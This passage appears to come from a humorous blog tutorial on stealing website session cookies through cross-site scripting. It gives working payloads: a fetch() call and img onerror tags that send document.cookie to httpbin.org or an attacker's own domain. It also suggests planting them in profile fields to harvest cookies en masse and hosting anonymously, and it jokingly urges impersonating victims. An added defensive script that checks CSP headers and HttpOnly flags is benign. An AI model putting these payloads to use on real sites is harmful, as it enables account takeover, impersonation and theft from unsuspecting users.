If you’ve made it this far, things are going swimmingly. You’ve found a site that leaves transportable cookies exposed to JavaScript and will parse and execute text that you give it. Now all you need is to get those cookies from the unsuspecting visitor’s computer into your dorito-dust-covered fingers.

For this last step we need …

A site that does not have a CSP

A Content Security Policy is a real pain. It lets the site restrict which domains the page is allowed to make requests to, so anything not on the list gets blocked from within the page. We can test this by pasting the following into the DevTools console:

fetch('//httpbin.org/post',{method:'POST',body:document.cookie})

You will see that on medium.com it gets blocked:

I’ve got a custom build of Chrome that plays sad-trombone on error.

Dammit.

You’ll see similar messages from twitter.com and facebook.com, although not, as it turns out, from my bloody bank. There you will see something like this:

Waap waap waaaaaaaap.

This confirms that I was able to send cookies to an unknown domain (in this case httpbin.org, which is a nice little site that just mirrors back whatever you send to it).

I should say, just because a site doesn’t have a content security policy, that doesn’t make it insecure (around one in ten users are on browsers that won’t enforce it anyway), but for our purposes we require a site with no CSP.

On a whim (I ❤ whims), I wondered if medium would let me request an image from (rather than post to) an unknown source. As it turns out it does. So in this case it’s easy enough to get around the CSP by just requesting an image and appending the cookies as query parameters.

<img src=x onerror="this.src = '//httpbin.org/image/png?c=' + document.cookie">

As with previous examples, this image fails to load (its src is just x), the onerror handler then sets its own source to a real image URL, and because that one loads fine it doesn’t error again. The image is a pig.

You’ve been pigged.

Wrapping it all up

Alrighty vegimity, assuming that you have lined up the pieces of Swiss cheese, you have managed to find a site where you can enter some text and have it parsed by another user’s browser, access the poor sucker’s unprotected cookies, send them off to your own domain, and use those to sign in as that person, all without their knowledge.

Of course you’re not just getting one person’s cookies, you’re harvesting them en masse.

Now just find a text field that will be visible to the maximum number of other users of that site (e.g. the bio field on medium) and enter something like this:

<img src=x onerror="fetch('//yourdomain.com', {method: 'POST', body: document.cookie})">

If fetch() is blocked (fetch requests are governed by the connect-src directive in the CSP), you can try the img URL approach (governed by the img-src directive in the CSP).

<img src=x onerror="this.src = '//httpbin.org/image/png?c=' + document.cookie">

The URL should of course point to your own domain. I believe Iceland is lovely this time of year and has some nice anonymous domain hosting options.
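Seen from the other side of the fence, the two directives just mentioned are exactly what a site owner wants to audit, along with whether the session cookie is readable from document.cookie at all. Here is an added example, written for this page rather than taken from the original post or from any of the sites named in it, that checks a Content-Security-Policy header for the fetch (connect-src) and image (img-src) channels, applying the default-src fallback, and checks a Set-Cookie header for HttpOnly. The sample headers are constructed and do not describe any real site’s policy.

```javascript
// Added example, not from the original post: a small checker for the
// "slices of Swiss cheese" discussed above, from the defender's side.
// fetch()/XHR are governed by the CSP connect-src directive and <img src>
// by img-src; both fall back to default-src when absent, and with no CSP
// at all nothing restricts them. A cookie is only reachable from
// document.cookie when Set-Cookie omits the HttpOnly attribute.

// Parse a Content-Security-Policy header value into { directive: [sources] }.
function parseCsp(header) {
  const directives = {};
  for (const part of header.split(';')) {
    const tokens = part.trim().split(/\s+/).filter(Boolean);
    if (tokens.length === 0) continue;
    const [name, ...sources] = tokens;
    directives[name.toLowerCase()] = sources;
  }
  return directives;
}

// Effective source list for a fetch directive: the directive itself, else
// default-src, else null (nothing restricts this channel at all).
// An empty list (e.g. "img-src;") means no source is allowed.
function effectiveSources(directives, name) {
  return directives[name] || directives['default-src'] || null;
}

// Source expressions that let the page reach any origin of someone else's choosing.
const OPEN_SOURCES = new Set(['*', 'http:', 'https:', 'http://*', 'https://*']);

function allowsArbitraryOrigin(sources) {
  if (sources === null) return true;
  return sources.some((s) => OPEN_SOURCES.has(s.toLowerCase()));
}

// Report whether each channel discussed above could reach a foreign origin.
function assessCsp(header) {
  const d = parseCsp(header);
  return {
    fetchToForeignOrigin: allowsArbitraryOrigin(effectiveSources(d, 'connect-src')),
    imgToForeignOrigin: allowsArbitraryOrigin(effectiveSources(d, 'img-src')),
  };
}

// True when a Set-Cookie header value leaves the cookie readable via document.cookie.
function cookieReadableByScript(setCookie) {
  const attributes = setCookie.split(';').slice(1); // skip the name=value pair
  return !attributes.some((a) => a.trim().toLowerCase() === 'httponly');
}

// Constructed sample headers for the demo (not any real site's policy).
const SAMPLES = {
  noCsp: '',
  imgOpen: "default-src 'self'; script-src 'self'; img-src * data:",
  locked: "default-src 'self'; connect-src 'self' https://api.example.com; img-src 'self'",
};

function demo() {
  for (const [label, header] of Object.entries(SAMPLES)) {
    console.log(label, assessCsp(header));
  }
  console.log('HttpOnly missing, readable:', cookieReadableByScript('sid=abc123; Path=/; Secure'));
  console.log('HttpOnly present, readable:', cookieReadableByScript('sid=abc123; Path=/; Secure; HttpOnly'));
}

demo();
```

The checker deliberately flags only source expressions that permit any origin; a host pattern such as *.example.com still confines requests to that domain and is not reported. Note too that a policy delivered only as Content-Security-Policy-Report-Only does not block anything, so check which header name the response actually carries.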

With great hacking comes great responsibility

If you do manage to get someone’s credentials to, say, a social network, please be responsible. Don’t just post photos of your rude parts; have a little class. Make innocuous posts late at night that are the sorts of things they would say; they will begin to think they’re sleep-sharing. Start writing upbeat Yelp reviews for late-night venues in their local area so they think they’re sleep-socializing, too. Naturally you will post Photoshopped photos of them having a great time and sneak into their house and put a little stamp on their wrist from the club in question.

If you can get into an online shopping account, order them a book you think they might enjoy, or Ayn Rand. Perhaps splash out and get something nice for their significant other — flowers or bathroom scales, something like that.